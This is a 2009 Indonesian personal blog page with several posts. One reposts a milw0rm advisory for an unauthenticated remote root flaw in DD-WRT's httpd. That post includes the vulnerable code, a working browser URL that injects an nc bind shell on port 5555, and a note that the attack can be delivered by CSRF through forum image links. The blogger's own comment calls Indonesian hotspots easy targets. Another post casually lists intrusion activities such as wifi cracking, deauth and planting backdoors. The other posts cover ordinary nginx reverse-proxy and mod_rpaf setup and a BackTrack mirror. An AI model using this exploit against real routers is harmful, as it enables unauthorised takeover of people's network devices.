Thursday, July 23, 2009

Kata Sesepuh Baca Google .......

Sudah keseribu kesekian kali saya bilang ke temen saya , cari di google , apa sih susahnya mencari di google , padahal mudah sekali tinggal "buka google disana ilmu numplek plek sampe meriang meriang deh tuh :D kalo belajar disana " itu kata sesepuh saya , ilmu kanuragan sakti mandera guna yang
itemnya : mulai dari ilmu lo cari target kecil-kecilan sampe target yang segede gaban , nyepam2x , intip sana sini , dapetin ribuan email yang isinya cuma botnet doank , masuk ke wifi tetangga , deauth sana sini , wardriving di area hotspot , buka backtrack nemuin hole , cari local exploit , target root pasang backdoor dan kalo kalo
putihnya elo bisa dapetin : install network , routing squid , pake nginx , oprek router cisco , ngetrace mana yang titiknya putus , bgp , ospf , router RIP , java , josso , jboss , buat vhost , dns server , mail server pake zimbra banyak , nah skarang tinggal pilih lo mau jadi apaan , kalo untuk pengalaman bolehlah belajar semua , pake untuk kebaikan , susah menciptakannya ... sekarang tinggal gimana kreatif nya masing-masing dan seberapa waktu yang elo luangkan untuk itu semua :) minimal ya 12 jam depan komputer + internet cukup lah ...

Wednesday, July 22, 2009

DD-WRT (httpd service) Remote Command Execution Vulnerability

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;


......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s905 server_dir != NULL ?
server_dir : "/www",file);
906 else
907 fprintf(exec, "/%s/%s\n",
908 server_dir != NULL ? server_dir : "/www",
file);
909 fclose(exec);
910
911 if (query) {
912 exec = fopen("/tmp/exec.query", "wb");
913 fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

914 free(query);
915 fclose(exec);
916 }
917
918 system2("chmod 700 /tmp/exec.tmp");
919 system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:




Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]

Berapa banyak hospot yang terdapat di indonesia ya ... metode cukup mudah ... :D apalagi hole ddwrt ini cukup menggairahkan ...

nginx proxy

Nginx terbukti ampuh seperti kata teman saya , kali ini saya akan mencoba implementasi penggunaan nginx ini .... nih konfigurasinya


#######################################################################
#
# This is the main Nginx configuration file.
#
# More information about the configuration options is available on
# * the English wiki - http://wiki.codemongers.com/Main
# * the Russian documentation - http://sysoev.ru/nginx/
#
#######################################################################

#----------------------------------------------------------------------
# Main Module - directives that cover basic functionality
#
# http://wiki.codemongers.com/NginxMainModule
#
#----------------------------------------------------------------------

user nobody nobody;
worker_processes 2;

error_log /var/log/nginx/error.log;
#error_log /var/log/nginx/error.log notice;
#error_log /var/log/nginx/error.log info;

pid /var/run/nginx.pid;



#----------------------------------------------------------------------
# Events Module
#
# http://wiki.codemongers.com/NginxEventsModule
#
#----------------------------------------------------------------------

events {
worker_connections 1024;
}


#----------------------------------------------------------------------
# HTTP Core Module
#
# http://wiki.codemongers.com/NginxHttpCoreModule
#
#----------------------------------------------------------------------

http {
include /etc/nginx/mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] $request '
'"$status" $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';

access_log /var/log/nginx/access.log main;

sendfile on;
#tcp_nopush on;
#tcp_noauth on ;
#keepalive_timeout 0;
keepalive_timeout 65;

gzip on;

# Load config files from the /etc/nginx/conf.d directory
include /etc/nginx/conf.d/*.conf;

#
# The default server
#
server {
listen 82;
server_name boc.telkom.net.id ;

access_log /var/log/nginx/host.access.log main;

# Main location
location / {
proxy_pass http://127.0.0.1:8080/;
proxy_redirect off;

proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

client_max_body_size 10m;
client_body_buffer_size 128k;

proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;

proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
}

# Static files location
location ~* ^.+.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|txt|tar|mid|midi|wav|bmp|rtf|js)$ {
root /spool/www/members_ng;
}

}
}

download modul rpaf

wget http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz

root@boc [~/mod_rpaf-0.6]# more README
mod_rpaf - reverse proxy add forward

This module does the opposite of mod_proxy_add_forward written
by Ask Bjørn Hansen. http://develooper.com/code/mpaf/

Compile and Install for 1.3:

apxs -i -a -c mod_rpaf.c

Compile and Install for 2.0:

apxs -i -c -n mod_rpaf-2.0.so mod_rpaf-2.0.c

or simply try:
make

Configuration Directives:
RPAFenable On
# Enable reverse proxy add forward
RPAFproxy_ips 127.0.0.1 10.0.0.1
# which ips are forwarding requests to us
RPAFsethostname On
# let rpaf update vhost settings
# allows to have the same hostnames as in the "real"
# configuration for the forwarding Apache
RPAFheader X-Forwarded-For
# Allows you to change which header mod_rpaf looks
# for when trying to find the ip the that is forwarding
# our requests



vi /usr/local/apache/conf.d/rpaf.conf


# Path to mod_rpaf-2.0.so, relative to /etc/httpd/
LoadModule rpaf_module modules/mod_rpaf-2.0.so

RPAFenable On
RPAFsethostname On

#Define our reverse proxy IP. Only substitute client IP in
#when we receive a request from this IP.
RPAFproxy_ips 127.0.0.1

# The header where the real client IP address is stored.
RPAFheader X-Forwarded-For

restart httpd , start nginx , jalan deh ................

Download Backtrack in Indonesia

This is new link to download backtrack in indonesia network, i make this for my contribution as opensource lovers ... , greats to http://opensource.telkomspeedy.com

download :

http://repo.opensource.telkomspeedy.com/backtrack/

we hope you enjoy ......